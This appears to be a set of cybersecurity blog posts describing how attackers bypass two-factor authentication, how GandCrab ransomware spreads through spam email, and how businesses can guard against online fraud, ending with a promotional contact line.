“I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service,” Gretzky described his Evilginx project. “It uses Nginx HTTP server to proxy legitimate login page, to visitors, and captures credentials and session cookies on-the-fly. It works remotely, uses custom domain and a valid SSL certificate.”
Gretzky added that Evilginx can be adapted to work with any website.
2. Exploiting Account-Recovery Systems
Another way cyberattackers bypass 2-factor authentication is by exploiting the account-recovery systems.
Cyberattackers who have previously hacked the personally-identifiable information of their victims can easily use the account-recovery feature of many websites by inputting the current password, answering password reset questions or calling tech support to get around the 2-factor authentication.
3. Brute Force Attacks
While many websites or online services have the 2-factor authentication feature, many don’t have bad login attempt control – a feature that locks out a user after a number of failed 2-factor authentication attempts.
Failure to put in place bad login attempt control will enable attackers to conduct brute force attacks, whereby they’ll simply guess the 2-factor authentication code over and over again until they hit the correct code. High-powered computers nowadays can crack thousands of passwords or codes per second.
Exercising caution whenever you grant an app access to your SMS, scanning apps for malware, being vigilant in clicking links as these might lead you to fake websites and not making it easy for hackers to guess your password reset questions are some of the measures in preventing cyberattackers from hacking your accounts via 2-factor authentication.
Two-factor authentication isn’t meant to replace other good cybersecurity practices. It’s meant only as an additional layer of security.
When you need help, our security professionals are a phone call away.
How to Avoid Being a Victim of Email-Based Ransomware
The latest version of the ransomware called “GandCrab” is an example of how cyber attackers bait their ransomware victims through email spam campaign.
Last month, security researchers at Fortinet observed a surge in an email spam campaign delivering the latest version of GandCrab ransomware.
GandCrab ransomware is a malicious software (malware) that encrypts files on the compromised computers, locks out users and demands a payment to decrypt or unlock the files.
How Ransomware Victims Are Baited via Email Spam Campaign
The latest version of GandCrab ransomware works by employing spam emails. While these spam emails don’t target specific individuals, it targets specific countries as emails in the US are the primary recipients of this spam campaign, followed by emails in the UK and emails in Canada.
Receivers of these spam emails are tricked into opening these malicious emails as the attackers use these subjects commonly used by people working in an organization:
Once the malware is downloaded to a compromised computer, all the files in the computer are then encrypted, preventing the user to access the files and a ransom note is posted on the computer screen.
This ransom note directs the user to a site using the TOR browser – a browser designed to protect privacy and anonymity. Once accessed, this site tells the victim that files on the compromised computer have been encrypted. The victim is asked to pay USD 800 within a certain period. If payment isn't done within the allowed period, the cost of decrypting the files is doubled.
GandCrab Ransomware Earlier Versions
The first version of GandCrab ransomware first appeared in the wild on January 30, 2018.
This early version of GandCrab ransomware was distributed as well via spam emails purporting to be invoices. The early version of GandCrab ransomware was also distributed via malicious advertisements (malvertisements) linked to malicious websites where the downloading of the GandCrab ransomware is then initiated.
Similar to the latest version of GandCrab, the first version spread into the wild and encrypts the files on the compromised computer. Instead of asking ransom payment in the form of US dollars, the first version of GandCrab asks for a ransom payment in the form of Dash cryptocurrency – the first time this cryptocurrency has been used in a ransomware campaign. In the past, ransomware attackers preferred cryptocurrencies Bitcoin and Monero as ransom payment.
According to Europol, European Union’s law enforcement agency, GandCrab ransomware is run as an affiliate program or ransomware-as-a-service. Anyone who wants to join the GandCrab affiliate program pays 30% to 40% of the ransom revenues to its creator and in return gets a full-featured web panel and technical support.
According to Check Point, as of March 13, 2018, GandCrab has infected over 50,000 computer systems and received an equivalent of USD 300,000 to USD 600,000 in ransom payments.
A tool to decrypt files encrypted by GandCrab (version 1)was developed by a combined effort of the Romanian authorities, Bitdefender and Europol and made available to the public for free.
According to Check Point, the decryptor tool wasn’t a result of a cryptographic breakthrough. It was, however, borne out of the law enforcement arm’s access to the ransomware’s master server, enabling the law enforcement arm to recover all private keys that had been used to perform the encryption made by GandCrab (version 1), evident with the decryptor tool’s dependence on an available victim ID.
Developers of GandCrab, however, regular modify the ransomware, making the decryption tool developed by the Romanian authorities, Bitdefender and Europol useless as it won't bring the files back.
Paying the ransom for the latest version of GandCrab is, therefore, not advisable as this doesn’t guarantee that the attackers have the capability or any intention to decrypt files.
Social Engineering Feature of GandCrab Ransomware
As can be gleaned from the different versions of GandCrab ransomware, social engineering is employed.
Social engineering cyberattack happens when an attacker uses a typical form of human interaction to obtain information about an organization or to compromise the organization’s computer systems.
Today’s human interaction now involves technology. Many human interactions now happen via email exchanges – a form of online communication that withstands even with the advent of new forms of communications like instant messaging, social networking and online chat.
GandCrab isn't the only ransomware that relies on spam emails for its distribution. Other notorious ransomware like Spora and Locky are also distributed through spam emails. For instance, on August 28th last year, in just a matter of 24 hours, over 23 million spam emails were sent carrying the Locky ransomware.
Interesting to note that these 3 ransomware GandCrab, Spora and Locky tricked their victims into opening email attachments laden with ransomware by using the subject “Invoice”.
Here are some of the best practices on how to avoid being a victim of email-based ransomware like GandCrab:
Are You Failing to Protect Yourself Against Fraud?
Online fraud is, sadly, a common danger.
More than 15 million people fell victim to it in 2016, and the risk is still very much present. Companies across all areas of industry must take steps to protect their finances, making any changes necessary to minimize threats.
Some of these may seem simple, while others appear a tad more complicated. As specialists in cybersecurity, we’re dedicated to helping businesses like yours stay safe against ever-more sophisticated tactics.
So, what changes can you make to your everyday operations to combat online fraud?
You Ignore the Warning Signs
Seeing new customers make large purchases can be an exciting time, but you need to be aware of some common warning signs.
Orders placed late at night could be a red flag, while large orders of products that can be resold easily are another fraud giveaway to watch out for.
Another red flag? Multiple attempts to buy an expensive item (or items) with the same payment method, but with minor differences in the expiration date or name.
Purchases made by buyers who have been repeat customers for a long time should be watched if they make an unusual change in their purchases, address, contact details, and order size.
Last but not least: be wary of customers buying goods with a domestic billing address but sending the purchases to international locations. This is especially true if multiple international addresses are used.
You Don’t Invest in the Best Security
In our experience, too many businesses – both big and small – invest too little into their cybersecurity. Even though businesses are expected to spend more than $100bn on online protectionin 2020, it’s still not uncommon to see companies letting themselves down.
It’s easy to assume you can handle your business’s online security when you first enter the market. After all, download some anti-virus software, get yourself a firewall – job done, right?
Sadly, it’s not so simple. Finding the budget for high-quality security protocols can be difficult, but it’s vital – you’re reinforcing your company’s infrastructure, protecting your assets, and minimizing further expense.
In other words: take the danger of online fraud seriously. Your customers and your employees are depending on you to keep their details, their salaries, and safer.
You Haven’t Educated Your Team
Your workforce has to be educated on the signs of online fraud, trained in criminals’ latest tactics and the techniques available to combat them.
After all, they’re the people keeping your operations running day in, day out. They’re handling customers’ purchases, processing transactions, communicating with buyers, using your databases, downloading resources, and more.
Uninformed staff may end up making mistakes that leave your business vulnerable, facing fraudulent activity, and ultimately at risk. When they have the information and the training, they can actually be a much-needed defense against cyber criminals preying on companies like yours.
Make sure you host regular meetings to train your employees on the cyber-security threats they are likely to encounter, and the warning signs they should watch out for. This doesn’t have to be at an expert level, as you don’t want to overwhelm or confuse them, but it should be enough to give them the confidence they need to perform at their best.
Your staff should know enough to identify possible fraudulent behavior, handle customers’ personal information properly, and avoid leaving your business exposed.
You Haven’t Implemented a Reliable Password Policy
Passwords have to be strong, hard to guess, and varied. Make sure your employees and your customers have the information and advice they need to avoid weak passwords.
We all have so many passwords to remember today. Many of us run numerous different aspects of our lives online, relying on online banking, online shopping, online communications … it’s easy to be complacent.
However, complacency leads you to use the same passwords again and again. Your customers may simply create an account and make purchases with your business, but inadvertently let someone else know what their password is.
This could lead to fraudulent purchases, and the customer might blame your company for failing to offer them sufficient advice on how to best create efficient passwords.
It’s vital, then, to provide helpful information at the sign-up stage, and a dedicated page on your site. Make sure they know not to use something simple and easy to find out, such as their child’s name or their birthday. Varying letter case, adding symbols and numbers, and combining words to make longer passwords can all be a big help.
Your employees should follow the same strategy. Using the same password in their work emails or accounts as their personal ones can make increase your business’s vulnerability.
You Don’t Run Background Checks on Your Employees
Hiring employees with a history of criminal activity or suspicious behavior in previous roles (leading to dismissals) can be an easy way to expose your business to fraud.
Running background checks may seem to be something of a hassle, but it’s well worth doing to protect your company. This should consist of criminal background checks, their education, and their past employment – you will have the information to identify who you have working for you.
Trust goes a long, long way in maintaining an efficient, satisfied workforce. If you know your team is unlikely to undertake fraudulent activity and put your company’s and your customers’ data at risk, you can focus on combating external dangers instead.
Employees will generally accept that these background checks are par for the course. Though it might seem intrusive, it’s for the good of your company, your clients, and your reputation.
Online fraud is an intimidating area and makes businesses of all sizes feel vulnerable. Taking the steps explored above is an effective start to a stronger infrastructure, but you should trust the professionals to reinforce (and maintain) your business’s cybersecurity program for maximum protection against threats.
Contact ustoday to assess your risks and protect your business.
Steve E. Driz